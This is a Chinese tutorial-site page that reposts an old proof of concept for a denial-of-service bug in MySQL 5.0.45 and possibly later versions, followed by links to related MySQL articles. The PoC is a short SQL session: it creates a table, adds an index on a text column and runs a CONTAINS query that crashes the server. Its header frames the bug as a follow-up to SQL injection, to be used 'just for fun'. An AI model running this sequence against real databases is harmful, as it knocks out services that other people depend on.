手机
当前位置:查字典教程网 >编程开发 >mysql数据库 >mysql 5.0.45 (修改)拒绝服务漏洞
mysql 5.0.45 (修改)拒绝服务漏洞
摘要:mysql5.0.45(修改)拒绝服务漏洞/**MySQLCreateTABLE`test`(`id`int(10)unsignedNOTN...

mysql 5.0.45 (修改)拒绝服务漏洞

/*

* MySQL <=6.0 possibly affected

* Kristian Erik Hermansen

* Credit: Joe Gallo

* You must have Alter permissions to exploit this bug!

* Scenario: You found SQL injection, but you want to punch backend server

* in the nuts just for fun. Start with the Alter TABLE statement on

* a table and field you know to exist. The first two SQL statements are

* simply to demostrate reproducibility...

*/

<snip>

mysql> Create TABLE `test` (

`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,

`foo` text NOT NULL

) ENGINE=InnoDB DEFAULT CHARSET=latin1;

Query OK, 0 rows affected

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');

Empty set

mysql> Alter TABLE test ADD INDEX (foo(100));

Query OK, 0 rows affected

Records: 0 Duplicates: 0 Warnings: 0

mysql> Select * FROM test Where CONTAINS(foo, ''bar'');

ERROR 2013 : Lost connection to MySQL server during query

</snip>

【mysql 5.0.45 (修改)拒绝服务漏洞】相关文章:

mysql字符集和数据库引擎修改方法分享

mysql开启远程登录功能

mysql主从服务器同步心得体会第1/2页

mysql三种批量增加的性能分析

Mysql修改datadir导致无法启动问题解决方法

解决 phpmyadmin #2002 无法登录 MySQL 服务器

mysql 日期和时间函数

mysql 10w级别的mysql数据插入

mysql 主从服务器的简单配置

mysql root用户的密码修改和消除

精品推荐
分类导航